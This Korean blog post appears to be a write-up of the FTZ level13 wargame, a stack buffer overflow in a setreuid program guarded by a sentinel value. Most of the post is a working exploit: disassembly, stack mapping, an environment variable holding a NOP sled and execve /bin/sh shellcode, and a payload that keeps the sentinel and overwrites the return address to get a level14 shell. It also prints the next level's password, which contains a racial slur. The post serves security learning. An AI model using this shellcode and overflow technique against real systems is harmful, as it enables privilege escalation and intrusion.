| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- buffer over flow
- Python
- Linux
- Hackerschool
- 뉴스클리핑
- RITSEC CTF 2019
- CodeEngn
- Next.js
- requests
- SQL Injection
- 버퍼오버플로우
- 리눅스
- 보안뉴스
- ctf
- 웹해킹
- reversing
- 어셈블리어
- writeup
- webhacking
- Shadow 동아리
- 리버싱
- NewsClipping
- RITSEC
- x64dbg
- PWN
- Nop Slide
- BOF
- ftz
- HackCTF
- termux
Archives
- Today
- Total
Jaeseo's Information Security Story
FTZ - level13 - WriteUp 본문
FTZ - level13 - WriteUp
level13:have no clue
일단 HINT를 보고 시작합니다!
[level13@ftz level13]$ cat hint
#include <stdlib.h>
main(int argc, char *argv[])
{
long i=0x1234567;
char buf[1024];
setreuid( 3094, 3094 );
if(argc > 1)
strcpy(buf,argv[1]);
if(i != 0x1234567) {
printf(" Warnning: Buffer Overflow !!! \n");
kill(0,11);
}
}
이번에는 기존의 level11, level12 문제와 달리 중간에 있는 i의 데이터가 수정이 되면 경고가 뜨고 프로그램이 강제로 종료 되는 조건문이 추가 되어 있는것을 볼 수 있습니다.
이제 tmp폴더에 프로그램을 짜고 gdb로 디버깅을 합니다.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c8 <main+0>: push ebp
0x080483c9 <main+1>: mov ebp,esp
0x080483cb <main+3>: sub esp,0x418 //stack 1048byte 확보
0x080483d1 <main+9>: and esp,0xfffffff0
0x080483d4 <main+12>: mov eax,0x0
0x080483d9 <main+17>: sub esp,eax
0x080483db <main+19>: mov DWORD PTR [ebp-12],0x1234567 //ebp-12 부분에 "0x1234567"
0x080483e2 <main+26>: sub esp,0x8 //stack 8byte 확보 총 1056byte 확보됨
0x080483e5 <main+29>: push 0xc16
0x080483ea <main+34>: push 0xc16
0x080483ef <main+39>: call 0x80482e8 <setreuid>
0x080483f4 <main+44>: add esp,0x10
0x080483f7 <main+47>: cmp DWORD PTR [ebp+8],0x1
0x080483fb <main+51>: jle 0x8048417 <main+79>
0x080483fd <main+53>: sub esp,0x8
0x08048400 <main+56>: mov eax,DWORD PTR [ebp+12]
0x08048403 <main+59>: add eax,0x4
0x08048406 <main+62>: push DWORD PTR [eax]
0x08048408 <main+64>: lea eax,[ebp-1048]
0x0804840e <main+70>: push eax
0x0804840f <main+71>: call 0x8048308 <strcpy>
0x08048414 <main+76>: add esp,0x10
0x08048417 <main+79>: cmp DWORD PTR [ebp-12],0x1234567
0x0804841e <main+86>: je 0x804843f <main+119>
0x08048420 <main+88>: sub esp,0xc
0x08048423 <main+91>: push 0x8048520
0x08048428 <main+96>: call 0x80482d8 <printf>
0x0804842d <main+101>: add esp,0x10
0x08048430 <main+104>: sub esp,0x8
0x08048433 <main+107>: push 0xb
0x08048435 <main+109>: push 0x0
0x08048437 <main+111>: call 0x80482f8 <kill>
0x0804843c <main+116>: add esp,0x10
0x0804843f <main+119>: leave
0x08048440 <main+120>: ret
End of assembler dump.
이것을 보고 Stack 구조를 예측 합니다.
| 스택 구조 |
|---|
| Data - 1024byte |
| Dummy Data - 12byte |
| DWORD(0x1234567) - 4byte |
| Dummy Data - 8byte |
| SFP(Stack Frame Pointer) - 4byte |
| RET(Return Address) - 4byte |
이제 stack 구조를 보고 맞는지 확인 합니다.
(gdb) r `python -c 'print "A"*1036'`
(gdb) x/100x $esp+1000
0xbfffbc68: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffbc78: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffbc88: 0xbf004141 0x01234567 0x42130a14 0x40015360
0xbfffbc98: 0xbfffbcb8 0x42015574 0x00000002 0xbfffbce4
0xbfffbca8: 0xbfffbcf0 0x4001582c 0x00000002 0x08048318
0xbfffbcb8: 0x00000000 0x08048339 0x080483c8 0x00000002
0xbfffbcc8: 0xbfffbce4 0x08048444 0x08048474 0x4000c660
0xbfffbcd8: 0xbfffbcdc 0x00000000 0x00000002 0xbfffd0e4
0xbfffbce8: 0xbfffd0ff 0x00000000 0xbfffd50a 0xbfffd528
0xbfffbcf8: 0xbfffd538 0xbfffd543 0xbfffd551 0xbfffd571
0xbfffbd08: 0xbfffd584 0xbfffd591 0xbfffd754 0xbfffd797
0xbfffbd18: 0xbfffd7b4 0xbfffd7c6 0xbfffd7db 0xbfffd7ec
0xbfffbd28: 0xbfffd7fd 0xbfffd810 0xbfffd818 0xbfffd837
0xbfffbd38: 0xbfffd847 0xbfffff78 0xbfffffaa 0xbfffffcc
0xbfffbd48: 0x00000000 0x00000020 0xffffe000 0x00000010
0xbfffbd58: 0x0f8bfbff 0x00000006 0x00001000 0x00000011
0xbfffbd68: 0x00000064 0x00000003 0x08048034 0x00000004
0xbfffbd78: 0x00000020 0x00000005 0x00000006 0x00000007
0xbfffbd88: 0x40000000 0x00000008 0x00000000 0x00000009
0xbfffbd98: 0x08048318 0x0000000b 0x00000c15 0x0000000c
0xbfffbda8: 0x00000c15 0x0000000d 0x00000c15 0x0000000e
0xbfffbdb8: 0x00000c15 0x0000000f 0xbfffd0df 0x00000000
0xbfffbdc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffbdd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffbde8: 0x00000000 0x00000000 0x00000000 0x00000000
실제로 1036만큼만 A를 채웠을때 그다음 내용이 0x123456789에 해당하는 데이터가 들어가 있는 것을 볼수 있습니다.
이제 이것을 보고 공격을 진행합니다.
[level13@ftz level13]$ export ATTACK=`python -c 'print "\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`그리고 환경변수의 주소를 가져오는 프로그램을 이용하여 주소를 가져옵니다.
[level13@ftz level13]$ /tmp/get.out ATTACK
0xbfffd84d
[level13@ftz level13]$ ./attackme `python -c 'print "\x90"*1036+"\x67\x45\x23\x01"+"\x90"*12+"\x4d\xd8\xff\xbf"'`
sh-2.05b$ whoami
level14
sh-2.05b$ my-pass
TERM environment variable not set.
Level14 Password is "what that nigga want?".
level14:what that nigga want?
'Write UP > FTZ' 카테고리의 다른 글
| FTZ - level15 - WriteUp (0) | 2019.11.26 |
|---|---|
| FTZ - level14 - WriteUp (0) | 2019.11.25 |
| FTZ - level12 - WriteUp (0) | 2019.11.18 |
| FTZ - level11 - WriteUp (0) | 2019.11.15 |
| FTZ - level10 - WriteUp (0) | 2019.11.13 |
'Write UP/FTZ' Related Articles
more
Comments